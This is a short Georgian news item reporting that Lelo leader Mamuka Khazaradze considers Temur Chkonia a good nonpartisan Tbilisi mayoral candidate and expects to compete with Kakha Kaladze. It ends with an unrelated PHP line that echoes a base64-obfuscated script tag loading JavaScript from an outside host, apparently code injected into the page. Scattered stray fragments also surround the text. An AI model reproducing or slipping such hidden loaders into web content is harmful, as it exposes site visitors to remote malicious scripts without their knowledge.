celsiusi
ავერსი შნაიდერი
ლელოს ლიდერი მამუკა ხაზარაძე ფიქრობს, რომ თვილისის მერობის კარგი კანდიდატი თემურ ჭყონია იქნება. ამის შესახებ მან TV პირველის ეთერში განაცხადა.
 
“თემურ ჭყონია იქნება ძალიან კარგი კანდიდატი, უპარტიო, ძალიან კარგი კანდიდატი. მე მქონდა საუბარი. ვერ დაგიდასტურებთ, რომ მისგან დადებითი პასუხი მივიღე. ვფიქრობ, საქმიანი ხალხი რაც უფრო მეტი მოვა, რომელსაც არა აქვს არანაირი პარტიული მიკერძოება და არის თავისუფალი და სულ კრიტიკულად გამოთქვამს და არის ორი უზარმაზარი ამერიკული კორპორაციის წარმატებული ადამიანი”,- ამბობს ხაზარაძე.
 
ხაზარაძემ ისიც აღნიშნა, რომ თბილისის მერიის არჩევნებში მონაწილეობას მიიღებენ და ისეთ კანდიდატს დააყენებენ, რომ ქართულ ოცნებას კონკურენცია გაუწიოს.
 
“მერობაზე ჩვენ გამოვალთ ისეთი კანდიდატით, რომელიც ძალიან სერიოზულ კონკურენციას გაუწევს ქართული ოცნების კანდიდატს, სავარაუდოდ, კახი კალაძეს”,- ამბობს ხაზარაძე.
 
ლელოს ლიდერის თქმით, ის კალაძეს პიროვნულად არ ერჩის და პატივს სცემს მის სპორტსმენობას.
 
1266
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");